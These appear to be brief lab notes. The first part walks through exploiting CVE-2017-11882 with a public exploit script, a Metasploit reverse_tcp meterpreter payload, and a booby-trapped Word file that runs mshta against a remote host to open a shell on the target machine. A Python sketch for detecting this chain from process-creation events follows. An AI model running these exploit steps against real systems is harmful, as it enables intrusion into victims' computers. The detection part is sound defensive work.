1. Clone the CVE-2017-11882 attack script from GitHub

git clone https://github.com/starnightcyber/CVE-2017-11882.git


2. Move PS_shell.rb to /usr/share/metasploit-framework/modules/exploits/windows/local/

mv PS_shell.rb /usr/share/metasploit-framework/modules/exploits/windows/local/


3. Start msf

msfconsole
use exploits/windows/local/PS_shell
set payload windows/meterpreter/reverse_tcp
set URIPATH abc
exploit

4. Open another Terminal

python Command_CVE-2017-11882.py -c "mshta http://your_lhost:8080/abc" -o test.doc

Open test.doc with Word on the target machine; msf on Kali gets the shell.
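
From the defender's side, this chain leaves a recognizable process-creation trace: CVE-2017-11882 is a flaw in the Office Equation Editor (EQNEDT32.EXE), so the embedded mshta command starts as a child of that process. The following detection sketch is an added example, not part of the original notes or the cloned repository. The event field names (parent, image, cmdline), the sample records and the two rules are assumptions constructed for illustration.

```python
import ntpath
import re

REMOTE_URL = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)

# Constructed process-creation records (hypothetical field names, sample values).
SAMPLE_EVENTS = [
    {"parent": r"C:\Program Files\Common Files\microsoft shared\EQUATION\EQNEDT32.EXE",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta http://192.0.2.10:8080/abc"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Tools\inventory.hta"'},
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta.exe https://example.test/a.hta"},
    {"parent": r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
     "image": r"C:\Windows\splwow64.exe",
     "cmdline": "splwow64.exe 8192"},
]

def basename(path):
    """Lower-cased file name of a Windows path, on any host OS."""
    return ntpath.basename(path or "").lower()

def classify(event):
    """Return (severity, reasons); severity is None when no rule matches."""
    severity, reasons = None, []
    # Rule 1: Equation Editor has no normal reason to start other programs.
    if basename(event.get("parent")) == "eqnedt32.exe":
        severity = "high"
        reasons.append("child process of EQNEDT32.EXE")
    # Rule 2: mshta.exe fetching script content from a remote URL.
    url = REMOTE_URL.search(event.get("cmdline", ""))
    if basename(event.get("image")) == "mshta.exe" and url:
        severity = severity or "medium"
        reasons.append("mshta.exe loading remote URL " + url.group(0))
    return severity, reasons

def detect(events):
    """Return (index, severity, reasons) for every record that matches a rule."""
    hits = []
    for i, ev in enumerate(events):
        severity, reasons = classify(ev)
        if severity:
            hits.append((i, severity, reasons))
    return hits

if __name__ == "__main__":
    for idx, severity, reasons in detect(SAMPLE_EVENTS):
        print(idx, severity, "; ".join(reasons))
```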